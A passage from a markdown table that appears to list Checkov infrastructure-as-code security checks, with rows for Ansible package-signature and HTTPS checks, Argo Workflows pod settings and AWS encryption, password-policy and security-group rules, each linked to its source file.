[AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 121 | CKV_ANSIBLE_5 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 122 | CKV_ANSIBLE_5 | resource | [].tasks[].block[].block[].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 123 | CKV_ANSIBLE_6 | resource | [?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 124 | CKV_ANSIBLE_6 | resource | [?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 125 | CKV_ANSIBLE_6 | resource | [].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 126 | CKV_ANSIBLE_6 | resource | [].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 127 | CKV_ANSIBLE_6 | resource | [].block[].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 128 | CKV_ANSIBLE_6 | resource | [].block[].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 129 | CKV_ANSIBLE_6 | resource | [].block[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 130 | CKV_ANSIBLE_6 | resource | [].block[].block[].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 131 | CKV_ANSIBLE_6 | resource | [].tasks[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 132 | CKV_ANSIBLE_6 | resource | [].tasks[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 133 | CKV_ANSIBLE_6 | resource | [].tasks[].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 134 | CKV_ANSIBLE_6 | resource | [].tasks[].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 135 | CKV_ANSIBLE_6 | resource | [].tasks[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 136 | CKV_ANSIBLE_6 | resource | [].tasks[].block[].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 137 | CKV_ANSIBLE_6 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 138 | CKV_ANSIBLE_6 | resource | [].tasks[].block[].block[].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 139 | CKV2_ANSIBLE_1 | resource | tasks.ansible.builtin.uri | Ensure that HTTPS url is used with uri | Ansible | [UriHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/UriHttpsOnly.yaml) | -| 140 | CKV2_ANSIBLE_1 | resource | tasks.uri | Ensure that HTTPS url is used with uri | Ansible | [UriHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/UriHttpsOnly.yaml) | -| 141 | CKV2_ANSIBLE_2 | resource | tasks.ansible.builtin.get_url | Ensure that HTTPS url is used with get_url | Ansible | [GetUrlHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/GetUrlHttpsOnly.yaml) | -| 142 | CKV2_ANSIBLE_2 | resource | tasks.get_url | Ensure that HTTPS url is used with get_url | Ansible | [GetUrlHttpsOnly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/GetUrlHttpsOnly.yaml) | -| 143 | CKV2_ANSIBLE_3 | resource | block | Ensure block is handling task errors properly | Ansible | [BlockErrorHandling.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/BlockErrorHandling.yaml) | -| 144 | CKV2_ANSIBLE_4 | resource | tasks.ansible.builtin.dnf | Ensure that packages with untrusted or missing GPG signatures are not used by dnf | Ansible | [DnfDisableGpgCheck.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfDisableGpgCheck.yaml) | -| 145 | CKV2_ANSIBLE_4 | resource | tasks.dnf | Ensure that packages with untrusted or missing GPG signatures are not used by dnf | Ansible | [DnfDisableGpgCheck.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfDisableGpgCheck.yaml) | -| 146 | CKV2_ANSIBLE_5 | resource | tasks.ansible.builtin.dnf | Ensure that SSL validation isn't disabled with dnf | Ansible | [DnfSslVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfSslVerify.yaml) | -| 147 | CKV2_ANSIBLE_5 | resource | tasks.dnf | Ensure that SSL validation isn't disabled with dnf | Ansible | [DnfSslVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfSslVerify.yaml) | -| 148 | CKV2_ANSIBLE_6 | resource | tasks.ansible.builtin.dnf | Ensure that certificate validation isn't disabled with dnf | Ansible | [DnfValidateCerts.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfValidateCerts.yaml) | -| 149 | CKV2_ANSIBLE_6 | resource | tasks.dnf | Ensure that certificate validation isn't disabled with dnf | Ansible | [DnfValidateCerts.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/DnfValidateCerts.yaml) | -| 150 | CKV_ARGO_1 | argo_workflows | spec | Ensure Workflow pods are not using the default ServiceAccount | Argo Workflows | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/argo_workflows/checks/template/DefaultServiceAccount.py) | -| 151 | CKV_ARGO_2 | argo_workflows | spec | Ensure Workflow pods are running as non-root user | Argo Workflows | [RunAsNonRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/argo_workflows/checks/template/RunAsNonRoot.py) | -| 152 | CKV_AWS_1 | data | aws_iam_policy_document | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [AdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/AdminPolicyDocument.py) | -| 153 | CKV_AWS_1 | resource | serverless_aws | Ensure IAM policies that allow full "*-*" administrative privileges are not created | serverless | [AdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/serverless/checks/function/aws/AdminPolicyDocument.py) | -| 154 | CKV_AWS_2 | resource | AWS::ElasticLoadBalancingV2::Listener | Ensure ALB protocol is HTTPS | Cloudformation | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBListenerHTTPS.py) | -| 155 | CKV_AWS_2 | resource | aws_alb_listener | Ensure ALB protocol is HTTPS | Terraform | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py) | -| 156 | CKV_AWS_2 | resource | aws_lb_listener | Ensure ALB protocol is HTTPS | Terraform | [ALBListenerHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBListenerHTTPS.py) | -| 157 | CKV_AWS_3 | resource | AWS::EC2::Volume | Ensure all data stored in the EBS is securely encrypted | Cloudformation | [EBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EBSEncryption.py) | -| 158 | CKV_AWS_3 | resource | aws_ebs_volume | Ensure all data stored in the EBS is securely encrypted | Terraform | [EBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSEncryption.py) | -| 159 | CKV_AWS_5 | resource | AWS::Elasticsearch::Domain | Ensure all data stored in the Elasticsearch is securely encrypted at rest | Cloudformation | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchEncryption.py) | -| 160 | CKV_AWS_5 | resource | aws_elasticsearch_domain | Ensure all data stored in the Elasticsearch is securely encrypted at rest | Terraform | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py) | -| 161 | CKV_AWS_5 | resource | aws_opensearch_domain | Ensure all data stored in the Elasticsearch is securely encrypted at rest | Terraform | [ElasticsearchEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py) | -| 162 | CKV_AWS_6 | resource | AWS::Elasticsearch::Domain | Ensure all Elasticsearch has node-to-node encryption enabled | Cloudformation | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py) | -| 163 | CKV_AWS_6 | resource | aws_elasticsearch_domain | Ensure all Elasticsearch has node-to-node encryption enabled | Terraform | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py) | -| 164 | CKV_AWS_6 | resource | aws_opensearch_domain | Ensure all Elasticsearch has node-to-node encryption enabled | Terraform | [ElasticsearchNodeToNodeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py) | -| 165 | CKV_AWS_7 | resource | AWS::KMS::Key | Ensure rotation for customer created CMKs is enabled | Cloudformation | [KMSRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/KMSRotation.py) | -| 166 | CKV_AWS_7 | resource | aws_kms_key | Ensure rotation for customer created CMKs is enabled | Terraform | [KMSRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSRotation.py) | -| 167 | CKV_AWS_8 | resource | AWS::AutoScaling::LaunchConfiguration | Ensure all data stored in the Launch configuration EBS is securely encrypted | Cloudformation | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LaunchConfigurationEBSEncryption.py) | -| 168 | CKV_AWS_8 | resource | aws_instance | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted | Terraform | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py) | -| 169 | CKV_AWS_8 | resource | aws_launch_configuration | Ensure all data stored in the Launch configuration or instance Elastic Blocks Store is securely encrypted | Terraform | [LaunchConfigurationEBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchConfigurationEBSEncryption.py) | -| 170 | CKV_AWS_9 | resource | aws_iam_account_password_policy | Ensure IAM password policy expires passwords within 90 days or less | Terraform | [PasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyExpiration.py) | -| 171 | CKV_AWS_10 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires minimum length of 14 or greater | Terraform | [PasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLength.py) | -| 172 | CKV_AWS_11 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one lowercase letter | Terraform | [PasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyLowercaseLetter.py) | -| 173 | CKV_AWS_12 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one number | Terraform | [PasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyNumber.py) | -| 174 | CKV_AWS_13 | resource | aws_iam_account_password_policy | Ensure IAM password policy prevents password reuse | Terraform | [PasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyReuse.py) | -| 175 | CKV_AWS_14 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one symbol | Terraform | [PasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicySymbol.py) | -| 176 | CKV_AWS_15 | resource | aws_iam_account_password_policy | Ensure IAM password policy requires at least one uppercase letter | Terraform | [PasswordPolicyUppercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/PasswordPolicyUppercaseLetter.py) | -| 177 | CKV_AWS_16 | resource | AWS::RDS::DBInstance | Ensure all data stored in the RDS is securely encrypted at rest | Cloudformation | [RDSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSEncryption.py) | -| 178 | CKV_AWS_16 | resource | aws_db_instance | Ensure all data stored in the RDS is securely encrypted at rest | Terraform | [RDSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEncryption.py) | -| 179 | CKV_AWS_17 | resource | AWS::RDS::DBInstance | Ensure all data stored in RDS is not publicly accessible | Cloudformation | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSPubliclyAccessible.py) | -| 180 | CKV_AWS_17 | resource | aws_db_instance | Ensure all data stored in RDS is not publicly accessible | Terraform | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py) | -| 181 | CKV_AWS_17 | resource | aws_rds_cluster_instance | Ensure all data stored in RDS is not publicly accessible | Terraform | [RDSPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py) | -| 182 | CKV_AWS_18 | resource | AWS::S3::Bucket | Ensure the S3 bucket has access logging enabled | Cloudformation | [S3AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3AccessLogs.py) | -| 183 | CKV_AWS_18 | resource | aws_s3_bucket | Ensure the S3 bucket has access logging enabled | Terraform | [S3BucketLogging.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketLogging.yaml) | -| 184 | CKV_AWS_19 | resource | AWS::S3::Bucket | Ensure the S3 bucket has server-side-encryption enabled | Cloudformation | [S3Encryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3Encryption.py) | -| 185 | CKV_AWS_19 | resource | aws_s3_bucket | Ensure all data stored in the S3 bucket is securely encrypted at rest | Terraform | [S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml) | -| 186 | CKV_AWS_19 | resource | aws_s3_bucket_server_side_encryption_configuration | Ensure all data stored in the S3 bucket is securely encrypted at rest | Terraform | [S3BucketEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketEncryption.yaml) | -| 187 | CKV_AWS_20 | resource | AWS::S3::Bucket | Ensure the S3 bucket does not allow READ permissions to everyone | Cloudformation | [S3PublicACLRead.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3PublicACLRead.py) | -| 188 | CKV_AWS_20 | resource | aws_s3_bucket | S3 Bucket has an ACL defined which allows public READ access. | Terraform | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml) | -| 189 | CKV_AWS_20 | resource | aws_s3_bucket_acl | S3 Bucket has an ACL defined which allows public READ access. | Terraform | [S3PublicACLRead.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLRead.yaml) | -| 190 | CKV_AWS_21 | resource | AWS::S3::Bucket | Ensure the S3 bucket has versioning enabled | Cloudformation | [S3Versioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3Versioning.py) | -| 191 | CKV_AWS_21 | resource | aws_s3_bucket | Ensure all data stored in the S3 bucket have versioning enabled | Terraform | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml) | -| 192 | CKV_AWS_21 | resource | aws_s3_bucket_versioning | Ensure all data stored in the S3 bucket have versioning enabled | Terraform | [S3BucketVersioning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketVersioning.yaml) | -| 193 | CKV_AWS_22 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker Notebook is encrypted at rest using KMS CMK | Terraform | [SagemakerNotebookEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookEncryption.py) | -| 194 | CKV_AWS_23 | resource | AWS::EC2::SecurityGroup | Ensure every security groups rule has a description | Cloudformation | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 195 | CKV_AWS_23 | resource | AWS::EC2::SecurityGroupEgress | Ensure every security groups rule has a description | Cloudformation | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 196 | CKV_AWS_23 | resource | AWS::EC2::SecurityGroupIngress | Ensure every security groups rule has a description | Cloudformation | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 197 | CKV_AWS_23 | resource | aws_db_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 198 | CKV_AWS_23 | resource | aws_elasticache_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 199 | CKV_AWS_23 | resource | aws_redshift_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 200 | CKV_AWS_23 | resource | aws_security_group | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 201 | CKV_AWS_23 | resource | aws_security_group_rule | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 202 | CKV_AWS_23 | resource | aws_vpc_security_group_egress_rule | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 203 | CKV_AWS_23 | resource | aws_vpc_security_group_ingress_rule | Ensure every security group and rule has a description | Terraform | [SecurityGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupRuleDescription.py) | -| 204 | CKV_AWS_24 | resource | AWS::EC2::SecurityGroup | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Cloudformation | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | -| 205 | CKV_AWS_24 | resource | AWS::EC2::SecurityGroupIngress | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Cloudformation | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | -| 206 | CKV_AWS_24 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | -| 207 | CKV_AWS_24 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | -| 208 | CKV_AWS_24 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | -| 209 | CKV_AWS_25 | resource | AWS::EC2::SecurityGroup | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Cloudformation | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | -| 210 | CKV_AWS_25 | resource | AWS::EC2::SecurityGroupIngress | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Cloudformation | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | -| 211 | CKV_AWS_25 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | -| 212 | CKV_AWS_25 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | -| 213 | CKV_AWS_25 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | -| 214 | CKV_AWS_26 | resource | AWS::SNS::Topic | Ensure all data stored in the SNS topic is encrypted | Cloudformation | [SNSTopicEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SNSTopicEncryption.py) | -| 215 | CKV_AWS_26 | resource | aws_sns_topic | Ensure all data stored in the SNS topic is encrypted | Terraform | [SNSTopicEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicEncryption.py) | -| 216 | CKV_AWS_27 | resource | AWS::SQS::Queue | Ensure all data stored in the SQS queue is encrypted | Cloudformation | [SQSQueueEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SQSQueueEncryption.py) | -| 217 | CKV_AWS_27 | resource | aws_sqs_queue | Ensure all data stored in the SQS queue is encrypted | Terraform | [SQSQueueEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueueEncryption.py) | -| 218 | CKV_AWS_28 | resource | AWS::DynamoDB::Table | Ensure DynamoDB point in time recovery (backup) is enabled | Cloudformation | [DynamodbRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamodbRecovery.py) | -| 219 | CKV_AWS_28 | resource | aws_dynamodb_table | Ensure DynamoDB point in time recovery (backup) is enabled | Terraform | [DynamodbRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamodbRecovery.py) | -| 220 | CKV_AWS_29 | resource | AWS::ElastiCache::ReplicationGroup | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at rest | Cloudformation | [ElasticacheReplicationGroupEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtRest.py) | -| 221 | CKV_AWS_29 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at rest | Terraform | [ElasticacheReplicationGroupEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtRest.py) | -| 222 | CKV_AWS_30 | resource | AWS::ElastiCache::ReplicationGroup | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit | Cloudformation | [ElasticacheReplicationGroupEncryptionAtTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransit.py) | -| 223 | CKV_AWS_30 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit | Terraform | [ElasticacheReplicationGroupEncryptionAtTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransit.py) | -| 224 | CKV_AWS_31 | resource | AWS::ElastiCache::ReplicationGroup | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit and has auth token | Cloudformation | [ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py) | -| 225 | CKV_AWS_31 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit and has auth token | Terraform | [ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py) | -| 226 | CKV_AWS_32 | resource | AWS::ECR::Repository | Ensure ECR policy is not set to public | Cloudformation | [ECRPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRPolicy.py) | -| 227 | CKV_AWS_32 | resource | 